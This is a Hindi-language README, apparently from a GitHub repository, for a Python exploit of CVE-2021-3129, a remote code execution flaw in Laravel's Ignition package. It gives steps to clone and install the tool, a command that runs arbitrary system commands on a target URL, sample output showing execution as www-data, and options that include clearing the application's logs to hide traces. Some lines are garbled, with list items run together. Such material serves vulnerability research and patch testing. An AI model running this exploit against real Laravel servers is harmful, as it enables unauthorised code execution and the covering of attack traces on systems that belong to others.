
CVE-2021-3129 के लिए Python शोषण जो कमजोर Laravel Ignition एंडपॉइंट्स पर मनमाने आदेशों को निष्पादित करने के लिए PHAR deserialization को स्वचालित करता है।
यह CVE-2021-3129 के लिए एक Python शोषण स्क्रिप्ट है, जो Laravel में Ignition पैकेज स्थापित होने पर एक रिमोट कोड निष्पादन भेद्यता है। यह भेद्यता एक हमलावर को PHAR डिसीरियलाइज़ेशन के माध्यम से मनमानी सिस्टम कमांड निष्पादित करने की अनुमति देती है।
phpggc का उपयोग करके स्वचालित रूप से PHAR पेलोड उत्पन्न करता हैid, whoami, आदि)requests लाइब्रेरीरिपॉजिटरी क्लोन करें:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
आवश्यक Python पैकेज स्थापित करें:
pip install requests
वांछित लक्ष्य और कमांड के साथ स्क्रिप्ट चलाएँ:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
उदाहरण आउटपुट:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target (आवश्यक): भेद्य Laravel एप्लिकेशन का URL.--cmd (वैकल्पिक): लक्ष्य पर निष्पादित किया जाने वाला कमांड (डिफ़ॉल्ट: whoami).--log_path (वैकल्पिक): उपयोग किया जाने वाला लॉग फ़ाइल पथ (डिफ़ॉल्ट: ../storage/logs/laravel.log).
